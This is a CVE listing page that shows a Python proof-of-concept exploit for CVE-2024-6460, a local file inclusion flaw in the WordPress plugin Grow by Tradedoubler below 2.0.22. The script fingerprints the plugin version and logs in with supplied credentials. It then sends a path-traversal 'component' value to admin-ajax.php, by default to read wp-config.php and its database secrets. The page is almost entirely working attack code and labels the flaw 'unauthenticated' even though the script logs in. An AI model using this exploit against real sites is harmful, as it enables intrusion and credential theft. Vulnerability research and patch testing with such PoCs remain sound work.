4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-6460
README.md
Rendering markdown...
POC / CVE-2024-6460.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import requests
import re

# By Nxploit Khaled_alenazi

requests.packages.urllib3.disable_warnings() # Disable SSL verification warnings

def url_check_version(url):
    version_url = url + '/wp-content/plugins/tradedoubler-affiliate-tracker/readme.txt'
    try:
        response = requests.get(version_url, verify=False)
        response.raise_for_status()
        
        # Find version number
        match = re.search(r'Version:\s*(\d+\.\d+\.\d+)', response.text)
        if match:
            version = match.group(1)
            print(f"Found version: {version}")
            if version <= '2.0.21':
                print("The site is vulnerable.")
                return True
            else:
                print("The site is not vulnerable.")
                return False
        else:
            print("Version information not found.")
            return False
    except requests.RequestException as e:
        print(f"Error accessing {version_url}: {e}")
        return False

def login_to_wordpress(session, url, username, password):
    login_url = url + '/wp-login.php'
    response = session.post(
        login_url,
        verify=False,
        data={
            'log': username,
            'pwd': password,
            'rememberme': 'forever',
            'wp-submit': 'Log+In'
        },
        headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"}
    )
    # Check login
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Logged in successfully.")
        return True
    else:
        print("Failed to log in.")
        return False

def exploit_ajax(session, url, component):
    ajax_url = url + '/wp-admin/admin-ajax.php'
    referer_url = url + '/wordpress/wp-admin/profile.php'
    payload = {'action': 'tm_load_data', 'component': component}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": referer_url,
        "Origin": url
    }
    # Send exploit request
    response = session.post(ajax_url, data=payload, headers=headers, verify=False)
    if response.status_code == 200:
        print("Exploit successful! Response:")
        print(response.text)
    else:
        print(f"Exploit failed with status code: {response.status_code}")

def main():
    parser = argparse.ArgumentParser(description="Grow by Tradedoubler < 2.0.22 - Unauthenticated LFI")
    parser.add_argument('-u', '--url', required=True, help="Target WordPress site URL (e.g., http://example.com)")
    parser.add_argument('-U', '--username', required=True, help="WordPress username")
    parser.add_argument('-P', '--password', required=True, help="WordPress password")
    parser.add_argument('-c', '--component', default='../../../../../wp-config.php', help="Path to the target file (default: wp-config.php)")
    args = parser.parse_args()

    if not url_check_version(args.url):
        return

    session = requests.Session()
    session.verify = False

    if not login_to_wordpress(session, args.url, args.username, args.password):
        exit()

    exploit_ajax(session, args.url, args.component)

if __name__ == "__main__":
    main()